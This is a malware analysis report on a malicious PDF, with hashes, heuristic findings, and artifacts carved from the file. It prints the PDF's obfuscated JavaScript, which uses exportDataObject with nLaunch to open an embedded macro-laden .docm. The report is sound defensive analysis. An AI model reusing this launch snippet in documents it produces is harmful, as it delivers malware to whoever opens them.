Malicious PDF — malware analysis report

Static analysis result for SHA-256 599bf06e3d58608c…

MALICIOUS

PDF

54.9 KB Created: 2017-06-06 11:45:13 +03:00 Authoring application: iTextSharp’ 5.5.10 ©2000-2016 iText Group NV (AGPL-version) First seen: 2017-06-27
MD5: ed2e371f1ad821054ec761b1aebff55e SHA-1: e31f4cc30e969fe849f8c612160b3d1e1670d02a SHA-256: 599bf06e3d58608c0c86327be2e1b914c4e89ad336567e3f4b3c1f96b51c5e32
76 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1566.002 Spearphishing Attachment

The PDF was flagged as malicious by an ML classifier with high confidence. Static analysis revealed embedded JavaScript, which is a common technique for delivering second-stage malware. The presence of an embedded JavaScript stream suggests the PDF is designed to execute code upon opening, likely to download and run additional malicious content. The document body was unreadable, but the heuristics and embedded script are strong indicators of malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 0.9997

Heuristics 5

  • Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action low 1 related finding PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded file low PDF_EMBEDDED
    PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload
  • PDF paints image(s) but contains no text operators info PDF_IMAGE_ONLY_LURE
    PDF has 1 image XObject(s) and the content stream contains no text-emitting operators (BT/ET, Tj, TJ, ', ") in either raw bytes or decompressed streams — this is the screenshot-as-PDF pattern used to bypass text-based scanners and to deliver instructions purely through rendered pixels. It is informational unless paired with invisible links or risky URI context.

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
272PXSBEPV908.docm pdf-embedded-file PDF EmbeddedFile object 2 at offset 0xA01 955 bytes
SHA-256: dbc574074df6d44c0bdcc6b5e49c3e17f57a96f7f402f0f877ca4a4bd91b7942
Detection
ClamAV: No threats found
Obfuscation or payload: likely
actual_type=ZIP; declared_or_context_type=PDF; filename=272PXSBEPV908.docm; kind=pdf-embedded-file
javascript_obj0004_001.js pdf-javascript-stream PDF /JS object 4 at offset 0xD610 131 bytes
SHA-256: 85b6700c2efe3fb68c3e1e4cfb2adcf6a0630474b076c2d3c3d565e5184511b4
Preview script
First 1,000 lines of the extracted script
var kkkllsslll=["nLaunch","cName","exportDataObject"];var rddd={};rddd[kkkllsslll[1]]= '272PXSBEPV908.docm';rddd[kkkllsslll[0]]= 2;

Open this report in the interactive analyzer, or submit your own file for analysis.